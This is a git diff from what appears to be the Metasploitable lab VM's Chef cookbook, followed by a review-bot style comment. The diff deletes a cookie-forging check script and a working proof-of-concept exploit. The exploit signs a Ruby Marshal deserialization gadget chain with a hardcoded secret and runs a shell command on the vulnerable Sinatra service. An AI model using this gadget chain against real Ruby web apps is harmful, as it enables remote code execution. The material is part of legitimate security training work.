diff --git a/chef/cookbooks/metasploitable/files/sinatra/README.txt b/chef/cookbooks/metasploitable/files/sinatra/README.txt
index 1ad1eab..3d9611c 100644
--- a/chef/cookbooks/metasploitable/files/sinatra/README.txt
+++ b/chef/cookbooks/metasploitable/files/sinatra/README.txt
@@ -9,13 +9,6 @@ Since this is a custom application, the Metasploitable player is required to figure out what the secret is (remotely, not through code reading), and write an exploit from scratch.
-For development purposes, you can use the following scripts to test the
-vulnerable service:
-
-* check.rb - This will check if the application is vulnerable.
-* poc.rb - This will attempt to exploit the application. It will create a
- file named /tmp/your_id.txt
-
 ==============
 Usage
 ==============
diff --git a/chef/cookbooks/metasploitable/files/sinatra/check.rb b/chef/cookbooks/metasploitable/files/sinatra/check.rb
deleted file mode 100644
index 647c424..0000000
--- a/chef/cookbooks/metasploitable/files/sinatra/check.rb
+++ /dev/null
@@ -1,26 +0,0 @@
-#!/usr/bin/env ruby
-
-#
-# This will check our vulnerable app to see if it's vulnerable or not.
-# It does so by predicting the hash in the cookie.
-#
-
-require 'openssl'
-require 'cgi'
-require 'net/http'
-
-SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
-
-cli = Net::HTTP.new('127.0.0.1', 8181)
-req = Net::HTTP::Get.new('/')
-res = cli.request(req)
-cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || ''
-data, hash = cookie.split('--')
-puts "[*] Found hash: #{hash}"
-puts "[*] Attempting to recreate the same hash with secret: #{SECRET}"
-expected_hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, CGI.unescape(data))
-puts "[*] Predicted hash: #{expected_hash}"
-
-if expected_hash == hash
-  puts "[*] Yay! we can predict the hash. The server is vulnerable."
-end 
diff --git a/chef/cookbooks/metasploitable/files/sinatra/poc.rb b/chef/cookbooks/metasploitable/files/sinatra/poc.rb
deleted file mode 100644
index c1de5bb..0000000
--- a/chef/cookbooks/metasploitable/files/sinatra/poc.rb
+++ /dev/null
@@ -1,34 +0,0 @@
-#!/usr/bin/env ruby
-
-#
-# This PoC will inject Ruby code in our vulnerable app.
-# It will run the system command "id", and save the output in /tmp/your_id.txt
-#
-
-require 'openssl'
-require 'cgi'
-require 'net/http'
-
-SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
-
-module Erubis;class Eruby;end;end
-module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
-
-erubis = Erubis::Eruby.allocate
-erubis.instance_variable_set :@src, "%x(id > /tmp/your_id.txt); 1"
-proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
-proxy.instance_variable_set :@instance, erubis
-proxy.instance_variable_set :@method, :result
-proxy.instance_variable_set :@var, "@result"
-
-session = { 'session_id' => '', 'exploit' => proxy }
-
-dump = [ Marshal.dump(session) ].pack('m')
-hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
-cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}"
-
-http = Net::HTTP.new('127.0.0.1', 8181)
-req = Net::HTTP::Get.new('/')
-req['Cookie'] = cookie
-res = http.request(req)
-puts "Done"
diff --git a/chef/cookbooks/metasploitable/recipes/sinatra.rb b/chef/cookbooks/metasploitable/recipes/sinatra.rb
index 583bb87..c4900c7 100644
--- a/chef/cookbooks/metasploitable/recipes/sinatra.rb
+++ b/chef/cookbooks/metasploitable/recipes/sinatra.rb
@@ -13,7 +13,7 @@ directory '/opt/sinatra' do
 mode '0777'
 end
-['Gemfile', 'README.txt', 'check.rb', 'poc.rb', 'start.sh', 'server.rb'].each do |fname|
+['Gemfile', 'README.txt', 'start.sh', 'server.rb'].each do |fname|
 cookbook_file "/opt/sinatra/#{fname}" do
 source "sinatra/#{fname}"
 mode '0777'
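Review bot: The rewritten file list on the `+` line in recipes/sinatra.rb is a plain array of quoted strings; the idiomatic Ruby form is `%w[Gemfile README.txt start.sh server.rb].each do |fname|`, which reads cleaner and makes future additions to the list less error-prone. The `cookbook_file` resource driven by this list still deploys every file, including server.rb and start.sh, with `mode '0777'`, so they land world-writable on the target; that is presumably deliberate for a Metasploitable box, but if not, `mode '0755'` is the usual setting for a script directory. The `each` block continues past the end of the hunk.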